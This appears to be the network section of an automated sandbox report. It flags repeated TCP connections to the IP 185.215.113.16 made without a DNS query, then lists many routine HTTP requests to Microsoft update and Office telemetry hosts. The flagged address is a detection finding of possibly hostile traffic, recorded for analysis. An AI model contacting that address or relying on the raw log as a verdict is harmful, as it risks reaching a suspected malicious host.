            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XPVFHs15PCyFd6Z&MD=YnMZZMZu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XPVFHs15PCyFd6Z&MD=YnMZZMZu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
